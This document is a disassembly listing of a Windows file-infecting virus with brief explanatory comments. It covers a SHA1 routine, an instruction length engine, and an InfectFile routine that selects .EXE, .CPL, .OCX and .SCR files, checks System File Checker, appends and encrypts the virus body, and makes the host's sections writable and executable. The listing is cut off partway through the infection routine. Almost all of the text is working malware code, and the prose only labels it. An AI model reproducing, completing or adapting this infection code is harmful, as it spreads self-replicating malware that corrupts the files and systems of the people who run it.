CODE:0040322F xor [esp+280h+var_2e0], edx CODE:00403233 rol eax, 1 CODE:00403235 xor [esp+280h+var_2e0], ebp CODE:00403239 mov [esp+280h+var_4cc], eax CODE:00403240 add edi, [esp+280h+var_2e0] CODE:00403244 ror ecx, 2 CODE:00403247 lea edi, [edi+eax-359d3e2ah] CODE:0040324E mov [esp+280h+var_2e0], edi CODE:00403252 mov eax, [esp+280h+var_4d4] CODE:00403259 rol [esp+280h+var_2e0], 5 CODE:0040325E xor eax, [esp+280h+var_4a8] CODE:00403265 add ebp, [esp+280h+var_2e0] CODE:00403269 xor eax, [esp+280h+var_4c0] CODE:00403270 mov [esp+280h+var_2e0], ebx

CODE:00403274 xor eax, [esp+280h+var_4c8] CODE:0040327B xor [esp+280h+var_2e0], ecx CODE:0040327F rol eax, 1 CODE:00403281 xor [esp+280h+var_2e0], edx CODE:00403285 mov [esp+280h+var_4c8], eax CODE:0040328C add ebp, [esp+280h+var_2e0] CODE:00403290 ror ebx, 2 CODE:00403293 lea ebp, [ebp+eax-359d3e2ah] CODE:0040329A mov [esp+280h+var_2e0], ebp CODE:0040329E mov eax, [esp+280h+var_4d0] CODE:004032A5 rol [esp+280h+var_2e0], 5 CODE:004032AA xor eax, [esp+280h+var_4a4] CODE:004032B1 add edx, [esp+280h+var_2e0] CODE:004032B5 xor eax, [esp+280h+var_4bc] CODE:004032BC mov [esp+280h+var_2e0], edi CODE:004032C0 xor eax, [esp+280h+var_4c4] CODE:004032C7 xor [esp+280h+var_2e0], ebx CODE:004032CB rol eax, 1 CODE:004032CD xor [esp+280h+var_2e0], ecx CODE:004032D1 mov [esp+280h+var_4c4], eax CODE:004032D8 add edx, [esp+280h+var_2e0] CODE:004032DC ror edi, 2 CODE:004032DF lea edx, [edx+eax-359d3e2ah] CODE:004032E6 mov [esp+280h+var_2e0], edx CODE:004032EA mov eax, [esp+280h+var_4cc] CODE:004032F1 rol [esp+280h+var_2e0], 5 CODE:004032F6 xor eax, [esp+280h+_temp_buffer] CODE:004032FD add ecx, [esp+280h+var_2e0] CODE:00403301 xor eax, [esp+280h+var_4b8] CODE:00403308 mov [esp+280h+var_2e0], ebp CODE:0040330C xor eax, [esp+280h+var_4c0] CODE:00403313 xor [esp+280h+var_2e0], edi CODE:00403317 rol eax, 1 CODE:00403319 xor [esp+280h+var_2e0], ebx CODE:0040331D mov [esp+280h+var_4c0], eax CODE:00403324 add ecx, [esp+280h+var_2e0] CODE:00403328 ror ebp, 2 CODE:0040332B lea ecx, [ecx+eax-359d3e2ah] CODE:00403332 mov [esp+280h+var_2e0], ecx CODE:00403336 mov eax, [esp+280h+var_4c8] CODE:0040333D rol [esp+280h+var_2e0], 5 CODE:00403342 xor eax, [esp+280h+var_4dc] CODE:00403349 add ebx, [esp+280h+var_2e0] CODE:0040334D xor eax, [esp+280h+var_4b4] CODE:00403354 mov [esp+280h+var_2e0], edx CODE:00403358 xor eax, [esp+280h+var_4bc] CODE:0040335F xor [esp+280h+var_2e0], ebp CODE:00403363 rol eax, 1 CODE:00403365 xor [esp+280h+var_2e0], edi CODE:00403369 mov [esp+280h+var_4bc], eax CODE:00403370 add ebx, [esp+280h+var_2e0] CODE:00403374 ror edx, 2 CODE:00403377 lea ebx, [ebx+eax-359d3e2ah] CODE:0040337E mov [esp+280h+var_2e0], ebx CODE:00403382 mov eax, [esp+280h+var_4c4] CODE:00403389 rol [esp+280h+var_2e0], 5 CODE:0040338E xor eax, [esp+280h+var_4d8]

CODE:00403395 add edi, [esp+280h+var_2e0] CODE:00403399 xor eax, [esp+280h+var_4b0] CODE:004033A0 mov [esp+280h+var_2e0], ecx CODE:004033A4 xor eax, [esp+280h+var_4b8] CODE:004033AB xor [esp+280h+var_2e0], edx CODE:004033AF rol eax, 1 CODE:004033B1 xor [esp+280h+var_2e0], ebp CODE:004033B5 mov [esp+280h+var_4b8], eax CODE:004033BC add edi, [esp+280h+var_2e0] CODE:004033C0 ror ecx, 2 CODE:004033C3 lea edi, [edi+eax-359d3e2ah] CODE:004033CA mov [esp+280h+var_2e0], edi CODE:004033CE mov eax, [esp+280h+var_4c0] CODE:004033D5 rol [esp+280h+var_2e0], 5 CODE:004033DA xor eax, [esp+280h+var_4d4] CODE:004033E1 add ebp, [esp+280h+var_2e0] CODE:004033E5 xor eax, [esp+280h+var_4ac] CODE:004033EC mov [esp+280h+var_2e0], ebx CODE:004033F0 xor eax, [esp+280h+var_4b4] CODE:004033F7 xor [esp+280h+var_2e0], ecx CODE:004033FB rol eax, 1 CODE:004033FD xor [esp+280h+var_2e0], edx CODE:00403401 mov [esp+280h+var_4b4], eax CODE:00403408 add ebp, [esp+280h+var_2e0] CODE:0040340C ror ebx, 2 CODE:0040340F lea ebp, [ebp+eax-359d3e2ah] CODE:00403416 mov [esp+280h+var_2e0], ebp CODE:0040341A mov eax, [esp+280h+var_4bc] CODE:00403421 rol [esp+280h+var_2e0], 5 CODE:00403426 xor eax, [esp+280h+var_4d0] CODE:0040342D add edx, [esp+280h+var_2e0] CODE:00403431 xor eax, [esp+280h+var_4a8] CODE:00403438 mov [esp+280h+var_2e0], edi CODE:0040343C xor eax, [esp+280h+var_4b0] CODE:00403443 xor [esp+280h+var_2e0], ebx CODE:00403447 rol eax, 1 CODE:00403449 xor [esp+280h+var_2e0], ecx CODE:0040344D mov [esp+280h+var_4b0], eax CODE:00403454 add edx, [esp+280h+var_2e0] CODE:00403458 ror edi, 2 CODE:0040345B lea edx, [edx+eax-359d3e2ah] CODE:00403462 mov [esp+280h+var_2e0], edx CODE:00403466 mov eax, [esp+280h+var_4b8] CODE:0040346D rol [esp+280h+var_2e0], 5 CODE:00403472 xor eax, [esp+280h+var_4cc] CODE:00403479 add ecx, [esp+280h+var_2e0] CODE:0040347D xor eax, [esp+280h+var_4a4] CODE:00403484 mov [esp+280h+var_2e0], ebp CODE:00403488 xor eax, [esp+280h+var_4ac] CODE:0040348F xor [esp+280h+var_2e0], edi CODE:00403493 rol eax, 1 CODE:00403495 xor [esp+280h+var_2e0], ebx CODE:00403499 mov [esp+280h+var_4ac], eax CODE:004034A0 add ecx, [esp+280h+var_2e0] CODE:004034A4 ror ebp, 2 CODE:004034A7 lea ecx, [ecx+eax-359d3e2ah] CODE:004034AE mov [esp+280h+var_2e0], ecx

CODE:004034B2 mov eax, [esp+280h+var_4b4] CODE:004034B9 rol [esp+280h+var_2e0], 5 CODE:004034BE xor eax, [esp+280h+var_4c8] CODE:004034C5 add ebx, [esp+280h+var_2e0] CODE:004034C9 xor eax, [esp+280h+_temp_buffer] CODE:004034D0 mov [esp+280h+var_2e0], edx CODE:004034D4 xor eax, [esp+280h+var_4a8] CODE:004034DB xor [esp+280h+var_2e0], ebp CODE:004034DF rol eax, 1 CODE:004034E1 xor [esp+280h+var_2e0], edi CODE:004034E5 mov [esp+280h+var_4a8], eax CODE:004034EC add ebx, [esp+280h+var_2e0] CODE:004034F0 ror edx, 2 CODE:004034F3 lea ebx, [ebx+eax-359d3e2ah] CODE:004034FA mov [esp+280h+var_2e0], ebx CODE:004034FE mov eax, [esp+280h+var_4b0] CODE:00403505 rol [esp+280h+var_2e0], 5 CODE:0040350A xor eax, [esp+280h+var_4c4] CODE:00403511 add edi, [esp+280h+var_2e0] CODE:00403515 xor eax, [esp+280h+var_4dc] CODE:0040351C mov [esp+280h+var_2e0], ecx CODE:00403520 xor eax, [esp+280h+var_4a4] CODE:00403527 xor [esp+280h+var_2e0], edx CODE:0040352B rol eax, 1 CODE:0040352D xor [esp+280h+var_2e0], ebp CODE:00403531 mov [esp+280h+var_4a4], eax CODE:00403538 add edi, [esp+280h+var_2e0] CODE:0040353C ror ecx, 2 CODE:0040353F lea edi, [edi+eax-359d3e2ah] CODE:00403546 add [esp+280h+var_2dc], edi CODE:0040354A add [esp+280h+var_2d8], ebx CODE:0040354E add [esp+280h+var_2d4], ecx CODE:00403552 add [esp+280h+var_2d0], edx CODE:00403556 add [esp+280h+var_2cc], ebp CODE:0040355A sub [esp+280h+_count], 40h CODE:0040355F jmp SHA1_Loop CODE:0040355F CODE:00403564 CODE:00403564 CODE:00403564 SHA1_LIPOF: CODE:00403564 cmp [esp+280h+_flag], 0 CODE:00403569 jz short SHA1_Finishing CODE:00403569 CODE:0040356B push 40h CODE:0040356D pop edx CODE:0040356E mov ecx, [esp+280h+_count] CODE:00403572 mov [esp+280h+_count], edx CODE:00403576 mov eax, ecx CODE:00403578 lea edi, [esp+280h+_temp_buffer] CODE:0040357F test eax, eax CODE:00403581 jz short only_null CODE:00403581 CODE:00403583 rep movsb CODE:00403583 CODE:00403585 CODE:00403585 only_null: CODE:00403585 mov ecx, eax

CODE:00403587 mov al, 80h CODE:00403589 stosb CODE:0040358A sub ecx, 37h CODE:0040358D neg ecx CODE:0040358F jz short save_size_in_pad CODE:0040358F CODE:00403591 jns short zero_mem CODE:00403591 CODE:00403593 add [esp+280h+_count], edx CODE:00403597 add ecx, edx CODE:00403597 CODE:00403599 CODE:00403599 zero_mem: CODE:00403599 xor al, al CODE:0040359B rep stosb CODE:0040359B CODE:0040359D CODE:0040359D save_size_in_pad: CODE:0040359D xor edx, edx CODE:0040359F mov eax, [esp+280h+_size] CODE:004035A3 push 8 CODE:004035A5 pop esi CODE:004035A6 mul esi CODE:004035A8 bswap eax CODE:004035AA bswap edx CODE:004035AC mov [edi], edx CODE:004035AE mov [edi+4], eax CODE:004035B1 lea esi, [esp+280h+_temp_buffer] CODE:004035B8 mov [esp+280h+_flag], 0 CODE:004035C0 jmp SHA1_Loop CODE:004035C0 CODE:004035C5 CODE:004035C5 CODE:004035C5 SHA1_Finishing: CODE:004035C5 mov edi, [esp+280h+arg_0] CODE:004035CC lea esi, [esp+280h+var_2dc] CODE:004035D0 push 5 CODE:004035D2 pop ecx CODE:004035D2 CODE:004035D3 CODE:004035D3 SHA1_CopyResult: CODE:004035D3 mov eax, [esi+ecx*4-4] CODE:004035D7 bswap eax CODE:004035D9 mov [edi+ecx*4-4], eax CODE:004035DD dec ecx CODE:004035DE jnz short SHA1_CopyResult CODE:004035DE CODE:004035E0 push 38h CODE:004035E2 pop ecx CODE:004035E3 xor eax, eax CODE:004035E5 lea edi, [esp+280h+_temp_buffer] CODE:004035EC rep stosd CODE:004035EE add esp, 260h CODE:004035F4 popa CODE:004035F5 retn 0Ch CODE:004035F5 CODE:004035F5 SHA1 endp

The previous code block hashes some data for the virus. The function requires 3 paramaeters, the address of data to be hashed, the number of bytes of data to be hashed and a pointer to the buffer to receive the message digest (20 bytes). CODE:004035F8 ILE proc near CODE:004035F8 CODE:004035F8 push esi CODE:004035F9 push edi CODE:004035FA cld CODE:004035FB call GetPrefixes CODE:004035FB CODE:00403600 call FindOpcode CODE:00403600 CODE:00403605 jb short @@Return CODE:00403605 CODE:00403607 push ebx CODE:00403608 xchg esi, edi CODE:0040360A movzx ecx, bl CODE:0040360D and cl, 3 CODE:00403610 add esi, ecx CODE:00403612 cmp cl, 1 CODE:00403615 jnz short @@NoTESTCheck CODE:00403615 CODE:00403617 cmp al, 0F6h CODE:00403619 jz short @@CheckForTEST CODE:00403619 CODE:0040361B cmp al, 0F7h CODE:0040361D jnz short @@NoTESTCheck CODE:0040361D CODE:0040361F CODE:0040361F @@CheckForTEST: CODE:0040361F push ecx CODE:00403620 mov cl, [esi] CODE:00403622 and cl, 38h CODE:00403625 pop ecx CODE:00403626 jnz short @@NoTESTCheck CODE:00403626 CODE:00403628 or bl, 24h CODE:0040362B and bl, 3Fh CODE:0040362E cmp al, 0F6h CODE:00403630 jz short @@NoTESTCheck CODE:00403630 CODE:00403632 or bl, 94h CODE:00403635 and bl, 0DFh CODE:00403635 CODE:00403638 CODE:00403638 @@NoTESTCheck: CODE:00403638 CODE:00403638 test bl, 4 CODE:0040363B jz short @@NoModRM CODE:0040363B CODE:0040363D push eax CODE:0040363E call DecodeModRM

CODE:0040363E CODE:00403643 pop eax CODE:00403643 CODE:00403644 CODE:00403644 @@NoModRM: CODE:00403644 test bh, 2 CODE:00403647 jz short @@NoOperandOrImmed CODE:00403647 CODE:00403649 test bl, 10h CODE:0040364C jz short @@NoOperandOrImmed CODE:0040364C CODE:0040364E shr bl, 5 CODE:00403651 add cl, bl CODE:00403653 sub cl, 2 CODE:00403656 add ecx, edx CODE:00403658 pop ebx CODE:00403659 jmp short @@Return CODE:00403659 CODE:0040365B CODE:0040365B CODE:0040365B @@NoOperandOrImmed: CODE:0040365B CODE:0040365B shr bl, 5 CODE:0040365E add cl, bl CODE:00403660 add ecx, edx CODE:00403662 pop ebx CODE:00403662 CODE:00403663 CODE:00403663 @@Return: CODE:00403663 CODE:00403663 pop edi CODE:00403664 pop esi CODE:00403665 retn CODE:00403665 CODE:00403665 ILE endp The previous code block is the main function for the Intstruction Length Rngine (ILE). The function expects a pointer to the instruction in the ESI register. CODE:00403666 GetPrefixes proc near CODE:00403666 xor ebx, ebx CODE:00403668 xor edx, edx CODE:0040366A lea edi, PrefixBuffer CODE:00403670 xchg esi, edi CODE:00403672 push 0Bh CODE:00403674 pop ecx CODE:00403674 CODE:00403675 CODE:00403675 @@NextPrefix: CODE:00403675 lodsb CODE:00403676 cmp [edi], al CODE:00403678 jnz short @@NotEqual CODE:00403678 CODE:0040367A push 0Ch CODE:0040367C pop ecx

CODE:0040367D inc edx CODE:0040367E inc edi CODE:0040367F lea esi, PrefixBuffer CODE:00403685 cmp al, 67h CODE:00403687 jnz short @@NoAddress CODE:00403687 CODE:00403689 or bh, 1 CODE:00403689 CODE:0040368C CODE:0040368C @@NoAddress: CODE:0040368C cmp al, 66h CODE:0040368E jnz short @@NoOperand CODE:0040368E CODE:00403690 or bh, 2 CODE:00403690 CODE:00403693 CODE:00403693 @@NoOperand: CODE:00403693 cmp al, 64h CODE:00403695 jnz short @@NotEqual CODE:00403695 CODE:00403697 or bh, 4 CODE:00403697 CODE:0040369A CODE:0040369A @@NotEqual: CODE:0040369A CODE:0040369A loop @@NextPrefix CODE:0040369A CODE:0040369C retn CODE:0040369C CODE:0040369C GetPrefixes endp The previous code block counts the prefixes and moves the register ESI. The function expects a pointer to the instruction in the ESI register. CODE:0040369D FindOpcode proc near CODE:0040369D CODE:0040369D var_1 = byte ptr -1 CODE:0040369D CODE:0040369D push ebx CODE:0040369E push edx CODE:0040369F lea esi, OpcodeTable CODE:0040369F CODE:004036A5 CODE:004036A5 @@NextGroup: CODE:004036A5 CODE:004036A5 lodsw CODE:004036A7 movzx ecx, al CODE:004036AA mov bl, ah CODE:004036AC stc CODE:004036AD jecxz short @@Failed CODE:004036AD CODE:004036AF movzx edx, bl CODE:004036B2 and dl, 3 CODE:004036B5 dec edx CODE:004036B6 jz short @@NextGroupEntry1

CODE:004036B6 CODE:004036B8 dec edx CODE:004036B9 jz short @@NextGroupEntry2 CODE:004036B9 CODE:004036BB mov edx, [edi] CODE:004036BD shl edx, 8 CODE:004036BD CODE:004036C0 CODE:004036C0 @@NextGroupEntry3: CODE:004036C0 lodsd CODE:004036C1 dec esi CODE:004036C2 shl eax, 8 CODE:004036C5 cmp eax, edx CODE:004036C7 jz short @@Return CODE:004036C7 CODE:004036C9 loop @@NextGroupEntry3 CODE:004036C9 CODE:004036CB jmp short @@NextGroup CODE:004036CB CODE:004036CD CODE:004036CD CODE:004036CD @@NextGroupEntry2: CODE:004036CD movzx edx, word ptr [edi] CODE:004036D0 test bl, 1000b CODE:004036D3 jz short @@NoRegIncoded2 CODE:004036D3 CODE:004036D5 and dh, 11111000b CODE:004036D5 CODE:004036D8 CODE:004036D8 @@NoRegIncoded2: CODE:004036D8 CODE:004036D8 lodsw CODE:004036DA cmp ax, dx CODE:004036DD jz short @@Return CODE:004036DD CODE:004036DF loop @@NoRegIncoded2 CODE:004036DF CODE:004036E1 jmp short @@NextGroup CODE:004036E1 CODE:004036E3 CODE:004036E3 CODE:004036E3 @@NextGroupEntry1: CODE:004036E3 mov dl, [edi] CODE:004036E5 test bl, 8 CODE:004036E8 jz short @@NoRegIncoded1 CODE:004036E8 CODE:004036EA and dl, 0F8h CODE:004036EA CODE:004036ED CODE:004036ED @@NoRegIncoded1: CODE:004036ED CODE:004036ED lodsb CODE:004036EE cmp al, dl CODE:004036F0 jz short @@Return CODE:004036F0 CODE:004036F2 loop @@NoRegIncoded1 CODE:004036F2

CODE:004036F4 jmp short @@NextGroup CODE:004036F4 CODE:004036F6 CODE:004036F6 CODE:004036F6 @@Return: CODE:004036F6 CODE:004036F6 clc CODE:004036F6 CODE:004036F7 CODE:004036F7 @@Failed: CODE:004036F7 mov [esp+5+var_1], bl CODE:004036FB pop edx CODE:004036FC pop ebx CODE:004036FD retn CODE:004036FD CODE:004036FD FindOpcode endp The previous code block finds an opcode in tables. The pointer expects a pointed to the opcode in EDI register. CODE:004036FE DecodeModRM proc near CODE:004036FE test bh, 1 CODE:00403701 jnz short @@DecodeModRM16 CODE:00403701 CODE:00403703 inc ecx CODE:00403704 lodsb CODE:00403705 mov ah, al CODE:00403707 and ah, 0C0h CODE:0040370A jz short @@FindSIB CODE:0040370A CODE:0040370C cmp ah, 0C0h CODE:0040370F jz short @@Done1 CODE:0040370F CODE:00403711 inc ecx CODE:00403712 cmp ah, 40h CODE:00403715 jz short @@FindSIB CODE:00403715 CODE:00403717 test bh, 1 CODE:0040371A jnz short @@AddTwo1 CODE:0040371A CODE:0040371C inc ecx CODE:0040371D inc ecx CODE:0040371D CODE:0040371E CODE:0040371E @@AddTwo1: CODE:0040371E inc ecx CODE:0040371E CODE:0040371F CODE:0040371F @@FindSIB: CODE:0040371F CODE:0040371F mov ah, al CODE:00403721 and ah, 11000111b CODE:00403724 cmp ah, 101b CODE:00403727 jnz short @@NoHardcoded CODE:00403727

CODE:00403729 add ecx, 4 CODE:00403729 CODE:0040372C CODE:0040372C @@NoHardcoded: CODE:0040372C mov ah, al CODE:0040372E and ah, 7 CODE:00403731 cmp ah, 4 CODE:00403734 jnz short @@Done1 CODE:00403734 CODE:00403736 inc ecx CODE:00403737 mov ah, al CODE:00403739 lodsb CODE:0040373A and ax, 1100000000000111b CODE:0040373E cmp ax, 100000000000101b CODE:00403742 jz short @@AddOneSIB CODE:00403742 CODE:00403744 cmp al, 101b CODE:00403746 jnz short @@Done1 CODE:00403746 CODE:00403748 add ecx, 11b CODE:00403748 CODE:0040374B CODE:0040374B @@AddOneSIB: CODE:0040374B inc ecx CODE:0040374B CODE:0040374C CODE:0040374C @@Done1: CODE:0040374C CODE:0040374C retn CODE:0040374C CODE:0040374D CODE:0040374D CODE:0040374D @@DecodeModRM16: CODE:0040374D inc ecx CODE:0040374E lodsb CODE:0040374F mov ah, al CODE:00403751 and ah, 0C0h CODE:00403754 jz short @@CheckDisp16 CODE:00403754 CODE:00403756 cmp ah, 0C0h CODE:00403759 jz short @@Done2 CODE:00403759 CODE:0040375B cmp ah, 40h CODE:0040375E jz short @@AddOne CODE:0040375E CODE:00403760 CODE:00403760 @@AddTwo2: CODE:00403760 inc ecx CODE:00403760 CODE:00403761 CODE:00403761 @@AddOne: CODE:00403761 inc ecx CODE:00403761 CODE:00403762 CODE:00403762 @@Done2: CODE:00403762 retn CODE:00403762

CODE:00403763 CODE:00403763 CODE:00403763 @@CheckDisp16: CODE:00403763 and al, 7 CODE:00403765 cmp al, 6 CODE:00403767 jz short @@AddTwo2 CODE:00403767 CODE:00403769 retn CODE:00403769 CODE:00403769 DecodeModRM endp The previous code decodes ModR/M and ModR/M16 byte. The function expects pointer to ModRM byte in ESI register and the instruction length in the ECX register. CODE:0040376A InfectFile proc near CODE:0040376A CODE:0040376A CODE:0040376A CODE:0040376A var_46c = dword ptr -46Ch CODE:0040376A CODE:0040376A CODE:0040376A pusha CODE:0040376A CODE:0040376B CODE:0040376B @@InfectIsBusy: CODE:0040376B cmp InfectState, 0 CODE:00403772 jnz short @@InfectIsBusy CODE:00403772 CODE:00403774 or InfectState, 0FFFFFFFFh CODE:0040377B lea ebx, sub_403ccc CODE:00403781 mov [ebp+0f4h], ebx CODE:00403787 lea ebx, @@NotInfectable CODE:0040378D mov [ebp+0f8h], ebx CODE:00403793 mov [ebp+0fch], esp CODE:00403799 lea ebx, [ebp+0f0h] CODE:0040379F push ebx CODE:004037A0 xor ebx, ebx CODE:004037A2 push dword ptr fs:[ebx] CODE:004037A5 pop dword ptr [ebp+0f0h] CODE:004037AB pop dword ptr fs:[ebx] CODE:004037AE lea esi, [ebp+168h] CODE:004037B4 call Uppercase CODE:004037B4 CODE:004037B9 mov edi, esi CODE:004037BB mov ebx, esi CODE:004037BB CODE:004037BD CODE:004037BD @@GetFileNameAndEndOfFileName: CODE:004037BD CODE:004037BD lodsb CODE:004037BE test al, al CODE:004037C0 jz short @@GotFileNameAndEndOfIt CODE:004037C0 CODE:004037C2 cmp al, '\' CODE:004037C4 jnz short @@GetFileNameAndEndOfFileName

CODE:004037C4 CODE:004037C6 mov ebx, esi CODE:004037C8 jmp short @@GetFileNameAndEndOfFileName CODE:004037C8 CODE:004037CA CODE:004037CA CODE:004037CA @@GotFileNameAndEndOfIt: CODE:004037CA xchg esi, edi CODE:004037CC cmp dword ptr [edi-5], 'EXE.' CODE:004037D3 jz short @@FileExtensionIsOk CODE:004037D3 CODE:004037D5 cmp dword ptr [edi-5], 'LPC.' CODE:004037DC jz short @@FileExtensionIsOk CODE:004037DC CODE:004037DE cmp dword ptr [edi-5], 'CXO.' CODE:004037E5 jz short @@FileExtensionIsOk CODE:004037E5 CODE:004037E7 cmp dword ptr [edi-5], 'RCS.' CODE:004037EE jnz @@NotInfectable CODE:004037EE CODE:004037F4 CODE:004037F4 @@FileExtensionIsOk: CODE:004037F4 CODE:004037F4 lea edi, Shit_List_Table CODE:004037FA xchg edi, esi CODE:004037FA CODE:004037FC CODE:004037FC @@CheckIfShitlisted: CODE:004037FC lodsw CODE:004037FE cmp [ebx], ax CODE:00403801 jz @@NotInfectable CODE:00403801 CODE:00403807 test ax, ax CODE:0040380A jnz short @@CheckIfShitlisted CODE:0040380A CODE:0040380C cmp dword ptr [ebx], 'TAOG' CODE:00403812 jnz @@NotInfectable CODE:00403812 CODE:00403818 mov ecx, [ebp+15ch] CODE:0040381E cmp ecx, 8000h CODE:00403824 jnb short @@CheckMaxFileSize CODE:00403824 CODE:00403826 mov eax, 0Ah CODE:0040382B call RandomNumber CODE:0040382B CODE:00403830 test eax, eax CODE:00403832 jnz @@NotInfectable CODE:00403832 CODE:00403838 CODE:00403838 @@CheckMaxFileSize: CODE:00403838 cmp ecx, 100000h CODE:0040383E jbe short @@FileSizeIsOk CODE:0040383E CODE:00403840 mov eax, 20h CODE:00403845 call RandomNumber CODE:00403845 CODE:0040384A test eax, eax

CODE:0040384C jnz @@NotInfectable CODE:0040384C CODE:00403852 CODE:00403852 @@FileSizeIsOk: CODE:00403852 cmp SFC_enabled, 0 CODE:00403859 jnz short @@NoSFC CODE:00403859 CODE:0040385B push ebx CODE:0040385C push 0 CODE:0040385E mov al, 21h CODE:00403860 call StealthAPI CODE:00403860 CODE:00403865 test eax, eax CODE:00403867 jnz @@NotInfectable CODE:00403867 CODE:0040386D CODE:0040386D @@NoSFC: CODE:0040386D push 80h CODE:00403872 push edi CODE:00403873 mov al, 11h CODE:00403875 call StealthAPI CODE:00403875 CODE:0040387A test eax, eax CODE:0040387C jz @@NotInfectable CODE:0040387C CODE:00403882 lea eax, [ebp+168h] CODE:00403888 push 0 CODE:0040388A push 80h CODE:0040388F push 3 CODE:00403891 push 0 CODE:00403893 push 0 CODE:00403895 push 0C0000000h CODE:0040389A push eax CODE:0040389B mov al, 14h CODE:0040389D call StealthAPI CODE:0040389D CODE:004038A2 mov [ebp+134h], eax CODE:004038A8 inc eax CODE:004038A9 jz @@RestoreAttributes CODE:004038A9 CODE:004038AF mov ecx, [ebp+15ch] CODE:004038B5 call MapFile CODE:004038B5 CODE:004038BA jz @@CloseFile CODE:004038BA CODE:004038C0 cmp word ptr [eax], 'ZM' CODE:004038C5 jnz @@UnMapFile CODE:004038C5 CODE:004038CB xor edx, edx CODE:004038CD call GetSection CODE:004038CD CODE:004038D2 cmp dword ptr [esi], 'EP' CODE:004038D8 jnz @@UnMapFile CODE:004038D8 CODE:004038DE test dword ptr [ebx+24h], 20000000h CODE:004038E5 jnz @@UnMapFile CODE:004038E5

CODE:004038EB mov eax, [esi+50h] CODE:004038EE cmp eax, [ebp+15ch] CODE:004038F4 jnz @@UnMapFile CODE:004038F4 CODE:004038FA mov eax, [ebx+10h] CODE:004038FD test eax, eax CODE:004038FF jz @@UnMapFile CODE:004038FF CODE:00403905 sub eax, [ebx+8] CODE:00403908 neg eax CODE:0040390A jge short @@VirtualSizeIsGreaterOrEqual CODE:0040390A CODE:0040390C mov eax, [ebx+10h] CODE:0040390F mov [ebx+8], eax CODE:00403912 xor eax, eax CODE:00403912 CODE:00403914 CODE:00403914 @@VirtualSizeIsGreaterOrEqual: CODE:00403914 mov [ebp+288h], eax CODE:0040391A add eax, 368Ch CODE:0040391F add eax, [ebx+10h] CODE:00403922 add eax, [ebx+14h] CODE:00403925 mov ecx, [esi+3ch] CODE:00403928 add eax, ecx CODE:0040392A div ecx CODE:0040392C mul ecx CODE:0040392E mov [esi+50h], eax CODE:00403931 mov [ebp+28ch], eax CODE:00403937 push eax CODE:00403938 push dword ptr [ebp+284h] CODE:0040393E mov al, 0Ah CODE:00403940 call StealthAPI CODE:00403940 CODE:00403945 push dword ptr [ebp+138h] CODE:0040394B mov al, 5 CODE:0040394D call StealthAPI CODE:0040394D CODE:00403952 pop ecx CODE:00403953 call MapFile CODE:00403953 CODE:00403958 jz @@CloseFile CODE:00403958 CODE:0040395E call GetSection CODE:0040395E CODE:00403963 mov edi, [ebx+14h] CODE:00403966 add edi, [ebx+10h] CODE:00403969 add edi, [ebp+284h] CODE:0040396F mov ecx, [ebp+288h] CODE:00403975 jecxz short @@NoSectionPadding CODE:00403975 CODE:00403977 add [ebx+10h], ecx CODE:0040397A xor eax, eax CODE:0040397C rep stosb CODE:0040397C CODE:0040397E CODE:0040397E @@NoSectionPadding: CODE:0040397E mov [ebp+2b4h], edi

CODE:00403984 push esi CODE:00403985 mov ecx, 368Ch CODE:0040398A lea esi, EntryPoint CODE:00403990 rep movsb CODE:00403992 pop esi CODE:00403993 pusha CODE:00403994 mov edx, [ebx+0ch] CODE:00403997 add edx, [ebx+10h] CODE:0040399A mov [ebp+2b0h], edx CODE:004039A0 add edx, [esi+34h] CODE:004039A3 lea eax, EntryPoint CODE:004039A9 sub edx, eax CODE:004039AB lea esi, [edi-368ch] CODE:004039B1 sub edi, 88Ah CODE:004039B7 call HMA CODE:004039B7 CODE:004039BC lea edi, [esi+2f3eh] CODE:004039C2 mov ecx, 20h CODE:004039C7 xor eax, eax CODE:004039C9 rep stosb CODE:004039CB lea edi, [esi+2f16h] CODE:004039D1 lea esi, [esi+276ah] CODE:004039D7 push 0FFFFFh CODE:004039DC push 698h CODE:004039E1 push esi CODE:004039E2 push edi CODE:004039E3 call RDKE32Encrypt CODE:004039E3 CODE:004039E8 popa CODE:004039E9 mov eax, 368Ch CODE:004039EE mov ecx, [esi+3ch] CODE:004039F1 add eax, ecx CODE:004039F3 xor edx, edx CODE:004039F5 div ecx CODE:004039F7 mul ecx CODE:004039F9 add [ebx+10h], eax CODE:004039FC add [ebx+8], eax CODE:004039FF sub eax, 368Ch CODE:00403A04 xchg eax, ecx CODE:00403A05 xor eax, eax CODE:00403A07 rep stosb CODE:00403A09 mov dword ptr [ebx+24h], 0E0000020h CODE:00403A10 add dword ptr [esi+64h], 2000h CODE:00403A17 pusha CODE:00403A18 call GetSection CODE:00403A18 CODE:00403A1D CODE:00403A1D @@ChangeSectionFlags: CODE:00403A1D or dword ptr [eax+24h], 0E0000000h CODE:00403A24 add eax, 28h CODE:00403A27 cmp eax, ebx CODE:00403A29 jnz short @@ChangeSectionFlags CODE:00403A29 CODE:00403A2B popa CODE:00403A2C call GetSection CODE:00403A2C CODE:00403A31 mov ebx, [esi+28h]

CODE:00403A34 xchg eax, esi CODE:00403A35 sub esi, 28h CODE:00403A35 CODE:00403A38 CODE:00403A38 @@TryNextSection: CODE:00403A38 CODE:00403A38 add esi, 28h CODE:00403A3B mov eax, [esi+0ch] CODE:00403A3E cmp eax, ebx CODE:00403A40 ja short @@TryNextSection CODE:00403A40 CODE:00403A42 add eax, [esi+8] CODE:00403A45 cmp eax, ebx CODE:00403A47 jb short @@TryNextSection CODE:00403A47 CODE:00403A49 mov [ebp+290h], esi CODE:00403A4F or dword ptr [esi+24h], 80000000h CODE:00403A56 mov edi, [ebp+284h] CODE:00403A5C mov edx, [esi+14h] CODE:00403A5F add edx, edi CODE:00403A61 mov [ebp+294h], edx CODE:00403A67 add edx, [esi+10h] CODE:00403A6A mov [ebp+298h], edx CODE:00403A70 sub ebx, [esi+0ch] CODE:00403A73 add ebx, [esi+14h] CODE:00403A76 lea esi, [ebx+edi] CODE:00403A79 sub esp, 400h CODE:00403A7F mov [ebp+2a4h], esp CODE:00403A85 and dword ptr [ebp+2a0h], 0 CODE:00403A8C mov eax, 10h CODE:00403A91 call RandomNumber CODE:00403A91 CODE:00403A96 inc eax CODE:00403A97 mov [ebp+2ach], eax CODE:00403A9D and dword ptr [ebp+2a8h], 0 CODE:00403AA4 mov dword ptr [ebp+2fch], 10000h CODE:00403AA4 CODE:00403AAE CODE:00403AAE @@GetNextInstruction: CODE:00403AAE CODE:00403AAE cmp esi, [ebp+294h] CODE:00403AB4 jb short @@PopEIPFromDatabase CODE:00403AB4 CODE:00403AB6 cmp esi, [ebp+298h] CODE:00403ABC ja short @@PopEIPFromDatabase CODE:00403ABC CODE:00403ABE call ILE CODE:00403ABE 